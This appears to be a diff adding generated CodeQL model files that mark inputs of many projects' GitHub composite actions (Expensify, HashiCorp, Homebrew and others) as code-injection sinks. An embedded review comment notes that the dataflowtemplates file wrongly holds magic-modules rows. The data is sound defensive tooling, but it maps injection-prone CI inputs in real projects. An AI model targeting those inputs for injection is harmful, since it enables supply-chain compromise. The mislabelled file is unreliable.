@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 000000000000..9b199fb5973c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 000000000000..13ae8d0f718e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 000000000000..04775e835715 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 000000000000..b0b5918d13fe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 000000000000..9879b7e44517 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 000000000000..e38a5edef48f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 000000000000..4fa53f367e41 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 000000000000..f3fa29375459 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..c66fab9d129b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 000000000000..f7e76b691130 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 000000000000..a216abf29acb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 000000000000..396841a6c168 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..1a3f383d23b3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 000000000000..98755665d860 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 000000000000..5849fe5c34f9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 000000000000..fdc8478bef74 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml new file mode 100644 index 000000000000..72b9c1c870ef --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 000000000000..b8688ab86d29 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 000000000000..e2aacd8f10b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 000000000000..13f28980e573 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 000000000000..ee1ef52ecd12 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 000000000000..14e60d9cc19b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 000000000000..0516493f6bab --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 000000000000..62e64b63b44a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "input.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 000000000000..e132ef1cee39 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 000000000000..90d50a1b757a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 000000000000..a8b9c41363ea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 000000000000..75652ed69f99 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 000000000000..973007c5490c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 000000000000..35a1a09df590 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 000000000000..6b193462780f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 000000000000..448f657d97ec --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 000000000000..009f4f1ef08e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 000000000000..bcb882872150 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 000000000000..8476c40ceaf2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml new file mode 100644 index 000000000000..462489a4c512 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..56b354c870e0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 000000000000..9fbb4108868d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml 
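Review bot: The new file `googlecloudplatform_dataflowtemplates.model.yml` in this hunk contains only rows for `googlecloudplatform/magic-modules` (one `actionsSinkModel` row and one `actionsSourceModel` row) and none for `googlecloudplatform/dataflowtemplates`, and its sink row is repeated verbatim in `googlecloudplatform_magic-modules.model.yml`, which is added immediately after it. The practical effect is that the dataflowtemplates action ships with no model while the magic-modules sink is declared twice; this looks like a generator or file-naming slip and is worth checking against the generator's input before the pack is released. The `actionsSourceModel` row in that file carries provenance `manual` although it lives under `ext/generated/`, where a re-run of the generator would presumably overwrite it; the same applies to the `manual` summary rows in the flagsmith, hashicorp/vault and jhipster files in this diff. If those hand-written rows are meant to survive regeneration, a non-generated model file under `ext/` would be the safer home for them.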
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 000000000000..5fc85d3530e9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 000000000000..b0b36e7bd36c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..cb2c50f440c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 000000000000..7ac5c21a6138 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] + - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 000000000000..1276334381da --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 000000000000..0fc27163dd09 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 100644 index 000000000000..ae994dbad1ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
